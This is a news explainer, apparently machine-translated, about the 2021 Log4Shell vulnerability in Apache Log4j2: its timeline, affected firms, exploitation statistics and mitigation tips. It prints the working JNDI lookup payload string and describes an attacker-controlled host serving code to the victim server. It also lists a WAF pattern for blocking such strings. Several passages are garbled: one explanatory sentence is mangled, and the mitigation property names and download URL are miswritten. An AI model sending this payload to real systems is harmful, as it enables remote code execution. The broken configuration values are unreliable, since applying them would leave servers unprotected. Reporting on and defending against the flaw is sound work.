EDIT: Technical group
On November 24, 2021, Alibaba Cloud's security team continued to screen for vulnerabilities as usual.
Unexpectedly, One of the team members, Chen Zhaojun, shoveled down and dug out one of the "biggest and most serious vulnerabilities in the past decade" - Log4Shell.
With this vulnerability, an attacker only needs to submit a string to access the other party's server, and even upload and run any code inside!
As a result, on December 10th, the programmers of the big factories who were already preparing for the weekend got up and worked overtime to deal with the vulnerability.
How many big factories have been affected by this loophole?
Because the Log4j2 library is so popular, including Apple, Tesla, Amazon, Cloudflare, ElasticSearch, Red Hat, Twitter, Steam, Baidu, NetEase, Tencent and other large manufacturers will be affected.
Possibly, hundreds, if not thousands, of other organizations will also be affected.
Some information security researchers expect a significant increase in attacks on servers on the internet in the coming days.
A moment of horror
On November 24, a remote code execution vulnerability in the open source project Apache Log4j2 was submitted.
On the morning of December 7, Apache released the 2.15.0-rc1 update.
On the evening of December 9, details of the exploit of the vulnerability were made public, spanning almost the entire version (from 2.0 to 2.14.1-rc1).
When everyone upgraded to 2.15.0-rc1, it was found that the patch could still be bypassed.
At around 2:30 a.m. on December 10, Apache Log4j2 was urgently updated with version 2.15.0-rc2.
At this time, all the big factories are almost staying up late to repair.
According to Tinder incomplete statistics, on Github alone, there are 60,644 open source projects released 321094 packages are at risk, and this vulnerability can be said to affect the normal operation of more than 70% of enterprise systems on the Internet.
In the Java development framework, affected by Log4j2 Top10 (Source: Tinder Security)
The vulnerability, called CVE-2021-44228, also known as Log4Shell or LogJam, is a remote code execution (RCE) class vulnerability in log4j2, an open source Java logbook used by "millions" of applications.
Since Java applications typically log a wide variety of events, such as messages sent and received by users, or details of system errors, the vulnerability can be triggered in a number of ways.
The most dangerous part of this vulnerability is that it is too easy for attackers to exploit, and even ordinary people with no experience can use this vulnerability to successfully perform attacks.
An attacker can execute arbitrary code by simply sending a special message to the server (containing a string like ${jndi:ldap://server.com/a}, and possibly taking full control of the system.
According to Ali's @programmer Ziyou, the server will record the JNDI and LDAP-based malicious payloads based on JNDI and LDAP included in the request sent by the attacker through Log4j2.com//}, where the http://attacker.com is the attacker-controlled address.
When the server requests http://server.com through JNDI and triggers a malicious payload, the http://attacker.com can add any executable scripts to the response and inject them into the server process.
So, last weekend, security teams at companies large and small scrambled to patch log4Shell vulnerabilities, potentially allowing hackers to compromise millions of devices on the Internet a second later.
And the hackers are not idle, security service provider Imperva monitored more than 1.4 million attacks on CVE-2021-44228 that day.
New Zealand's Computer Emergency Response Team (CERT), Deutsche Telekom and Greynoise's network monitoring service have all warned that "attackers are already actively exploiting this vulnerability."
According to Greynoise, about 100 different hosts are looking for ways to exploit the Log4j2 vulnerability at scale.
Soon, several information security news organizations reported on this critical vulnerability found in the Apache Log4j2 library with a CVSS severity of 10, CVE-2021-44228.
The Alibaba Cloud security team issued an announcement on December 10.
https://help.aliyun.com/noticelist/articleid/1060971232.html
The National Internet Emergency Response Center issued an announcement on December 10.
https://www.cert.org.cn/publish/main/9/2021/20211210110550958546708/20211210110550958546708_.html
The U.S. National Computer Vulnerability Database was announced on December 10.
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
The Apache Foundation also responded quickly, suggesting that all developers can upgrade and update the Log4j2 library they are using to version 2.15.0, and if they cannot be upgraded for some reason, they can use the method described in the Apache Log4j2 security vulnerability page to save it.
On December 12, some netizens reflected that the bank's procedures could not be used, speculating that they may be working overtime to check, and it seems that the scope of the impact is indeed quite large.
At this point, the programmers were about to cry and complained:
"Overnight Repair"
"Busy most of the day"
The national search engine Baidu was first violently tested by the majority of netizens!
When the vulnerability was first exposed, if you enter a command in the Baidu search box, and then you can find the access information in the dnslog, and then the developers also urgently fixed the vulnerability.
Then, netizens broke apple, which has always been known for its security.
Minecraft was also killed.
Because Minecraft also uses Log4j2 in the software and has a wide range of uses, this has led to all servers in all series of Minecraft versions except Mohist 1.18 in a high-risk state.
This way, entering commands in the chat bar allows you to cheat in the game.
For Minecraft server owners, the most important thing to do at the moment is to immediately shut down the server and carry out upgrades and emergency repairs, and ordinary players need to wait until the server confirms that the repair is complete.
According to the recommendations of 360, users can do the following.
For users using Apache Log4j2, please update the program to the latest official security version (2.15.0-rc2). Download address:
https://github.com/apache/logging-Log4j22/releases/tag/Log4j2-2.15.0-rc2
Modify the Log4j2 configuration:
Log4j22.formatMsgNoLookups=True
Set the JVM boot parameters:
-DLog4j22.formatMsgNoLookups=true
To set environment variables:
The FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS value is true
The following settings or actions may be useful in protecting against this security incident, but they are not guaranteed. It is recommended to configure it in combination with actual application scenarios:
Use a higher version of the JDK as possible
Use rasp to block the call of lookup
Use waf to intercept ${jndi in traffic
All unnecessary external data is prohibited.
As soon as log4j2's security incident came out, it was inevitable that the majority of users would start to wonder again: Is open source software really safe?
On the one hand, everyone thinks that open source software, the code is in hand, in the case of complying with the open source protocol, it is basically a white prostitute.
On the other hand, I think that there are so many people staring at this code, there will definitely be no bugs, otherwise someone will definitely mention issue to fix. At no cost, it is expected to have enterprise-level maintenance support and security guarantees.
As everyone knows, most of the open source software is developed by the author in his spare time, and the driving force for contributing code to the open source community all comes from star and "generating electricity with love".
It is also because it is free, some open source software has a particularly large audience size, from small companies to hundreds of billions of market value enterprises are using, if once there is a vulnerability, the consequences will be unimaginable.
Therefore, open source is risky, and it needs to be used with caution!
Resources:
https://www.lunasec.io/docs/blog/Log4j2-zero-day/
https://twitter.com/MalwareTechBlog/status/1469289471463944198
http://jandan.net/p/109993
https://www.zhihu.com/question/504954921/answer/2265750721
https://mp.weixin.qq.com/s/I2UxrqGEC05NA4wsGRkzkw